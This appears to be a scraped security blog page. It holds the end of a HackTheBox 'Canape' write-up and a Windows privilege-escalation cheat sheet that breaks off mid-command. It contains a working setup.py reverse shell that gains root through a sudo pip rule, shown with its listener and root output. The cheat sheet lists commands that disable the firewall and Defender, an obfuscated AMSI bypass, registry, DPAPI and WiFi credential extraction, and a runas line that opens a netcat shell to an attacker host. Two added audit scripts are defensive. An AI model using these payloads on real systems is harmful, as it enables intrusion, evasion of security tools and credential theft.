[sudo] password for homer:
Matching Defaults entries for homer on canape:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User homer may run the following commands on canape:
(root) /usr/bin/pip install *<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre><b>
root shell:</b></span></div><div><span style="font-family: courier; font-size: medium;">pip runs a package's setup.py as root during <b>sudo pip install</b>, so a setup.py with a custom install command gives a root shell:</span></div><div><span style="font-family: courier; font-size: medium;"><pre><code>import os
import socket
import subprocess
from setuptools import setup
from setuptools.command.install import install

# pip executes this install command as root when the package is installed
class Exploit(install):
    def run(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("10.10.14.7",9002))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        p = subprocess.call(["/bin/sh", "-i"])

setup(
    cmdclass={
        "install": Exploit
    }
)
</code></pre>
<br />
<pre><code>
homer@canape:~/theshahzada$ sudo pip install .
The directory '/home/homer/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/homer/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /home/homer/theshahzada
Installing collected packages: UNKNOWN
Running setup.py install for UNKNOWN ... -
</code></pre>
<pre><code>
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.70] 47212
# python -c 'import pty;pty.spawn("bash")'
root@canape:/tmp/pip-GiMdT7-build# id
id
uid=0(root) gid=0(root) groups=0(root)</code></pre>
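<div>An added example for the defender's side of this step (my code, not from the write-up): a small audit over <b>sudo -l</b> output that flags rules like the <b>/usr/bin/pip install *</b> one above, where a wildcard leaves the caller to choose what runs as root. The sample output is constructed to resemble the listing, and the parser assumes the <b>(runas) [TAG:] command</b> line format that sudo prints under "may run the following commands".</div>

```python
"""Audit helper over `sudo -l` output (added example, not from the write-up).

Flags rules that hand the caller control of what runs as root. A trailing
wildcard such as `/usr/bin/pip install *` lets the user choose the package
source, and pip executes that package's setup.py as root during install.
Assumes the `(runas) [TAG:] command` line format sudo -l prints under
"may run the following commands"; SAMPLE_SUDO_L is constructed.
"""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for homer on canape:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User homer may run the following commands on canape:
    (root) /usr/bin/pip install *
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (ALL : ALL) ALL
"""

RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*"      # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"    # optional NOPASSWD:, SETENV:, ...
    r"(?P<cmd>.+)$"                  # the command spec, possibly with globs
)


def parse_rules(text):
    """Return (runas, tags, command) tuples for each rule line in sudo -l output."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = tuple(t.rstrip(":") for t in m.group("tags").split())
            rules.append((m.group("runas"), tags, m.group("cmd").strip()))
    return rules


def audit(text):
    """Return [(command, reason)] for rules a reviewer should look at."""
    findings = []
    for _runas, tags, cmd in parse_rules(text):
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command")
        if "*" in cmd:
            reasons.append("wildcard lets the caller pick arguments")
        if "NOPASSWD" in tags:
            reasons.append("no password prompt")
        if reasons:
            findings.append((cmd, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit(SAMPLE_SUDO_L):
        print("%-45s %s" % (cmd, reason))
```

<div>A rule that survives this audit still deserves a look at what the binary does with a fixed argument list; the wildcard check only catches the case on this box, where the argument after <b>install</b> is entirely the user's.</div>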
</span></div><div><span style="font-family: courier; font-size: medium;"><b><br /></b></span></div><div><span style="font-family: courier; font-size: medium;"><b>HTB Profile:</b> <a href="https://app.hackthebox.com/profile/37502">https://app.hackthebox.com/profile/37502</a><br /><b><br /></b></span></div><div><span style="font-family: courier; font-size: medium;"><b>Reference:</b></span></div><div><ul style="text-align: left;"><li><span style="font-family: courier; font-size: x-small;">I've taken some notes from the official writeup, <a href="https://0xdf.gitlab.io/2018/09/15/htb-canape.html" target="_blank">0xdf</a> writeup and <a href="https://www.youtube.com/watch?v=rs75y2qPonc" target="_blank">ippsec's</a> video</span></li><li><span style="font-family: courier; font-size: x-small;">https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py</span></li><li><span style="font-family: courier; font-size: x-small;">https://www.exploit-db.com/exploits/44913</span></li><li><span style="font-family: courier; font-size: x-small;">https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/</span></li></ul><div><span style="font-family: courier; font-size: x-small;"><br /></span></div></div>TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-72897583809332721262021-02-23T01:21:00.000+06:002021-02-23T01:21:08.698+06:00Windows Privilege Escalation<div style="text-align: center;"><span style="font-family: courier; font-size: x-large;"><b><span><br /></span></b></span></div><div style="text-align: center;"><span style="font-family: courier; font-size: x-large;"><b><span>Windows Local Privilege Escalation</span></b></span></div><div style="text-align: center;"><span style="font-family: courier; font-size: x-large;"><b><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCYeOS95w0qTfpVldwbKzi_iy-Ag_dymfD_VS0tG43zFnp0EhyphenhyphenLqVc-Q031yDK373cV2raQ_ahScOvMN5HBeDVuNCr14L5snKWCby_wRPHbUXKCVqBUPhz7TVDaBA9hPqUTviZEGif48/s1920/windows.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCYeOS95w0qTfpVldwbKzi_iy-Ag_dymfD_VS0tG43zFnp0EhyphenhyphenLqVc-Q031yDK373cV2raQ_ahScOvMN5HBeDVuNCr14L5snKWCby_wRPHbUXKCVqBUPhz7TVDaBA9hPqUTviZEGif48/s16000/windows.png" /></a></div><br /></b></span></div><div style="text-align: center;"><div><span style="font-family: courier; font-size: large;"><b>==System Info==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">#Windows Version and Configuration</span></div><div style="text-align: left;"><span style="font-family: courier;">::OS Version::</span></div><div style="text-align: left;"><span style="font-family: courier;">systeminfo | findstr /B /C:"OS Name" /C:"OS Version"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Extract patches and updates::</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic qfe</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Architecture::</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all env variables::</span></div><div style="text-align: left;"><span style="font-family: courier;">set</span></div><div 
style="text-align: left;"><span style="font-family: courier;">Get-ChildItem Env: | ft Key,Value</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all drives::</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic logicaldisk get caption || fsutil fsinfo drives</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic logicaldisk get caption,description,providername</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root</span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Users & Groups Enumeration==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Get current username::</span></div><div style="text-align: left;"><span style="font-family: courier;">echo %USERNAME% || whoami</span></div><div style="text-align: left;"><span style="font-family: courier;">$env:username</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List user privilege::</span></div><div style="text-align: left;"><span style="font-family: courier;">whoami /priv</span></div><div style="text-align: left;"><span style="font-family: courier;">whoami /groups</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all users::</span></div><div style="text-align: left;"><span style="font-family: courier;">net user</span></div><div style="text-align: left;"><span style="font-family: courier;">whoami /all</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalUser | ft 
Name,Enabled,LastLogon</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem C:\Users -Force | select Name</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List logon requirements; useable for bruteforcing::</span></div><div style="text-align: left;"><span style="font-family: courier;">net accounts</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Get details about a user (i.e. administrator, admin, current user)::</span></div><div style="text-align: left;"><span style="font-family: courier;">net user administrator</span></div><div style="text-align: left;"><span style="font-family: courier;">net user admin</span></div><div style="text-align: left;"><span style="font-family: courier;">net user %USERNAME%</span></div><div style="text-align: left;"><span style="font-family: courier;">List all local groups</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">net localgroup</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalGroup | ft Name</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Get details about a group (i.e. 
administrators)::</span></div><div style="text-align: left;"><span style="font-family: courier;">net localgroup administrators</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalGroupMember Administrators | ft Name, PrincipalSource</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource</span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Network Enumeration==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::List all network interfaces, IP, and DNS.::</span></div><div style="text-align: left;"><span style="font-family: courier;">ipconfig /all</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-DnsClientServerAddress -AddressFamily IPv4 | ft</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::</span><span style="text-align: center;"><span style="font-family: courier;">Hosts file</span></span><span style="font-family: courier;">::</span></div><div style="text-align: left;"><span style="font-family: courier;">type C:\Windows\System32\drivers\etc\hosts</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List current routing table::</span></div><div style="text-align: left;"><span style="font-family: courier;">route print</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex</span></div><div 
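style="text-align: left;"><span style="font-family: courier;"></span></div></code></pre><div><span style="font-family: courier;">The netstat -ano and tasklist entries in this section still leave you matching PIDs by hand. The function below is an added example (my own code, not taken from the original cheat sheet or the sources it references): it joins every listening TCP socket to its owning process, the account that process runs as and its command line, and with -LoopbackOnly shows only the services bound to 127.0.0.1 / ::1, which are the usual port-forwarding candidates. It assumes the NetTCPIP module (Windows 8 / Server 2012 and later); the function and parameter names are my own.</span></div>

```powershell
# Added example (my own code, not from the original cheat sheet): join the
# output of "netstat -ano" and "tasklist" into one table. Each listening TCP
# socket is reported with the owning process, the account it runs as and its
# command line, so loopback-only services (port-forwarding candidates) and
# SYSTEM-owned listeners stand out. Needs Get-NetTCPConnection (Windows 8+).
function Get-ListeningSocketOwner {
    [CmdletBinding()]
    param(
        # Report only sockets bound to 127.0.0.1 / ::1.
        [switch]$LoopbackOnly
    )

    # Build a PID -> process-info map once. Win32_Process exposes the command
    # line and lets us ask for the owner, which Get-Process hides for processes
    # the current user cannot open. Owner stays $null where GetOwner is denied.
    $procs = @{}
    foreach ($p in Get-CimInstance -ClassName Win32_Process) {
        $owner = $null
        try {
            $o = Invoke-CimMethod -InputObject $p -MethodName GetOwner -ErrorAction Stop
            if ($o.ReturnValue -eq 0) { $owner = '{0}\{1}' -f $o.Domain, $o.User }
        } catch { }
        $procs[[int]$p.ProcessId] = [pscustomobject]@{
            Name        = $p.Name
            Owner       = $owner
            CommandLine = $p.CommandLine
        }
    }

    Get-NetTCPConnection -State Listen |
        Where-Object { (-not $LoopbackOnly) -or ($_.LocalAddress -in @('127.0.0.1', '::1')) } |
        Sort-Object LocalPort, LocalAddress |
        ForEach-Object {
            $info = $procs[[int]$_.OwningProcess]
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                PID          = $_.OwningProcess
                Process      = $info.Name
                Owner        = $info.Owner
                CommandLine  = $info.CommandLine
            }
        }
}

# Usage: full listing, then only the services that are unreachable from the network.
Get-ListeningSocketOwner | Format-Table -AutoSize
Get-ListeningSocketOwner -LoopbackOnly | Format-Table LocalAddress, LocalPort, Process, Owner -AutoSize
```

<div><span style="font-family: courier;">Owner and CommandLine come back empty where the process cannot be opened (typically SYSTEM-owned or protected processes when you run unprivileged); that by itself tells you the listener belongs to a more privileged context.</span></div><pre><code><div 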
style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List the ARP table::</span></div><div style="text-align: left;"><span style="font-family: courier;">arp -a</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all current connections::</span></div><div style="text-align: left;"><span style="font-family: courier;">netstat -ano</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List firewall state and current configuration::</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh advfirewall firewall dump</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">or (legacy netsh firewall context, still present on older builds)</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">netsh firewall show state</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh firewall show config</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List firewall's blocked ports::</span></div><div style="text-align: left;"><span style="font-family: courier;">$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports</span></div><div style="text-align: left;"><span style="font-family: courier;"><br 
/></span></div><div style="text-align: left;"><span style="font-family: courier;">::Disable firewall & Defender (both need an elevated shell)::</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh firewall set opmode disable</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh advfirewall set allprofiles state off</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all network shares::</span></div><div style="text-align: left;"><span style="font-family: courier;">net share</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::SNMP Configuration::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse</span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Windows Defender==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Check the status of Defender::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> Get-MpComputerStatus</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Disable Real Time Monitoring (needs admin; silently ignored while Tamper Protection is on)::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> Set-MpPreference -DisableIOAVProtection 
$true</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">sc config WinDefend start= disabled</span></div><div style="text-align: left;"><span style="font-family: courier;">sc stop WinDefend</span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==AppLocker Enumeration==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::List of AppLocker rules::</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ApplockerPolicy -Effective -xml</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections</span></div><div style="text-align: left;"><span style="font-family: courier;">$a = Get-ApplockerPolicy -effective</span></div><div style="text-align: left;"><span style="font-family: courier;">$a.rulecollections</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Powershell==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Default PowerShell locations in a Windows system.::</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\windows\syswow64\windowspowershell\v1.0\powershell</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\WindowsPowerShell\v1.0\powershell</span></div><div style="text-align: left;"><span style="font-family: 
courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Example of AMSI Bypass.::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Powershell history::</span></div><div style="text-align: left;"><span style="font-family: courier;">type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">type C:\Users\TheShahzada\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">cat (Get-PSReadlineOption).HistorySavePath</span></div><div style="text-align: left;"><span style="font-family: courier;">cat (Get-PSReadlineOption).HistorySavePath | sls passw</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Password in Alternate Data Stream::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS > Get-Item -path flag.txt -Stream *</span></div><div style="text-align: left;"><span style="font-family: courier;">PS > Get-Content -path flag.txt -Stream Flag</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Processes Enumeration and 
Tasks==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::What processes are running?::</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">tasklist /v</span></div><div style="text-align: left;"><span style="font-family: courier;">net start</span></div><div style="text-align: left;"><span style="font-family: courier;">sc query</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Service</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Process</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Which processes are running as "system"?::</span></div><div style="text-align: left;"><span style="font-family: courier;">tasklist /v /fi "username eq system"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Do you have powershell magic?::</span></div><div style="text-align: left;"><span style="font-family: courier;">REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List installed programs::</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime</span></div><div 
style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List services::</span></div><div style="text-align: left;"><span style="font-family: courier;">net start</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic service list brief</span></div><div style="text-align: left;"><span style="font-family: courier;">tasklist /SVC</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Scheduled tasks::</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">schtasks /query /fo LIST 2>nul | findstr TaskName</span></div><div style="text-align: left;"><span style="font-family: courier;">schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM   # the grep step is run on the attacking host after copying the file over</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Startup tasks::</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">wmic startup get caption,command</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</span></div><div style="text-align: left;"><span style="font-family: courier;">dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"</span></div><div style="text-align: left;"><span style="font-family: courier;">dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Windows Credentials==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Winlogon Credentials::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">#Other way</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon" /v AltDefaultDomainName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Use the cmdkey to list the stored credentials on the machine. */</span></div><div style="text-align: left;"><span style="font-family: courier;">cmdkey /list</span></div><div style="text-align: left;"><span style="font-family: courier;">Currently stored credentials:</span></div><div style="text-align: left;"><span style="font-family: courier;"> Target: Domain:interactive=WORKGROUP\Administrator</span></div><div style="text-align: left;"><span style="font-family: courier;"> Type: Domain Password</span></div><div style="text-align: left;"><span style="font-family: courier;"> User: WORKGROUP\Administrator</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share */</span></div><div style="text-align: left;"><span style="font-family: courier;">runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Using runas with a provided set of credential. 
*/</span></div><div style="text-align: left;"><span style="font-family: courier;">/* runas has no password switch: it prompts for the password on the console, so this needs an interactive session (the /savecred entry above is the way round the prompt). */</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::DPAPI::</span></div><div style="text-align: left;"><span style="font-family: courier;">/* In theory, the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Each DPAPI master key is 64 bytes of random data, stored as a file under the user's Protect directory and itself encrypted with a key derived from the user's password; it is what protects the user's private keys and credential blobs. (Notice that the Protect directory is hidden, so a plain dir from cmd does not show it (dir /a does), but you can list it from PS). 
*/</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* You can use mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.</span></div><div style="text-align: left;"><span style="font-family: courier;">The credentials files protected by the master password are usually located in: */</span></div><div style="text-align: left;"><span style="font-family: courier;">dir C:\Users\username\AppData\Local\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;">dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Wifi::</span></div><div style="text-align: left;"><span style="font-family: courier;">#List saved Wifi using</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh wlan show profile</span></div><div style="text-align: left;"><span style="font-family: courier;">#To get the clear-text password use</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh wlan show profile 
